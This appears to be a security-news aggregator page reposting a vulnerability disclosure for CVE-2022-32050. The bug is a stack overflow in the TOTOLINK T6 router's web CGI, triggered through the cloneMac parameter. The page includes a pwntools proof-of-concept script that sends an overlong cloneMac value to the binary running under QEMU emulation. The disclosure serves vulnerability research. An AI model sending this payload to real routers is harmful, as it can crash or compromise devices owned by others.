Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2022-32050: IoT-vuln/Totolink/T6-v2/9.setWanCfg at main · d1tto/IoT-vuln

TOTOLINK T6 V4.1.9cu.5179_B20201015 was discovered to contain a stack overflow via the cloneMac parameter in the function FUN_0041af40.

CVE
#vulnerability#web#mac#js

The vulnerability exists in the router’s WEB component. /web_cste/cgi-bin/cstecgi.cgi FUN_0041af40 (at address 0x41af40) gets the JSON parameter cloneMac, but without checking its length, copies it directly to local variables in the stack, causing stack overflow:

from pwn import * import json

data = { "topicurl": "setting/setWanCfg", "proto": "0", "staticIp": "192.168.2.1", "staticMask": "255.255.255.0", "staticGw": "192.168.2.1", "staticMtu": "0", "cloneMac": "A"*0x400 }

data = json.dumps(data) print(data)

argv = [ "qemu-mipsel-static", "-g", "1234", "-L", "./root/", "-E", "CONTENT_LENGTH={}".format(len(data)), "-E", "REMOTE_ADDR=192.168.2.1", “./cstecgi.cgi” ]

a = process(argv=argv) a.sendline(data.encode())

a.interactive()

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda